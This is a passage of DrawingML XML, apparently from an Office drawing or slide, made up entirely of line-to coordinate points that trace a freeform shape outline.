                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="804" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="802" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="802" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="796" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="793" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="791" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="791" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="790" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="785" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="787" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="786" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="781" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="772" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="774" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="776" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="775" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="706" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="654" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="597" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="444" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="438"/>
